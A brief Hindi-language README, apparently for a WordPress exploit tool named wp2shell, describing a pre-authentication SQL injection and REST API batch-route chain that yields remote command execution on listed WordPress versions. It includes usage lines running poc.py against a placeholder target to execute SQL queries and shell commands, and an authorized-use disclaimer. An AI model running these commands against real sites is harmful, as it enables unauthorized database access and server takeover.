
wp2shell के लिए मानक कमजोर WordPress RCE poc।
WordPress REST API बैच-रूट कन्फ्यूजन श्रृंखला के लिए प्री-ऑथ टाइमिंग-आधारित SQL इंजेक्शन PoC का अब तक का पहला PoC (CVE-2026-63030 + CVE-2026-60137)
केवल एडमिन पासवर्ड क्रैक करने की कोशिश किए बिना कमांड निष्पादन प्राप्त किया गया।
प्रभावित: WordPress 6.9.0–6.9.4 और 7.0.0–7.0.1। 6.9.5 और 7.0.2 में ठीक किया गया।
python3 poc.py https://target.example
python3 poc.py https://target.example 'SELECT DATABASE()'
python3 poc.py https://target.example -c "echo "you got pwned" > /tmp/pwned.txt && id"
शोध: Searchlight Cyber · Aikido · Aikido Intel · WordPress
अस्वीकरण: यह प्रूफ ऑफ कॉन्सेप्ट केवल अधिकृत शैक्षिक, सुरक्षा अनुसंधान और घटना प्रतिक्रिया उद्देश्यों के लिए प्रदान किया गया है; अर्थात, इसका उपयोग केवल उन सिस्टमों पर करें जिनके मालिक आप हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति है।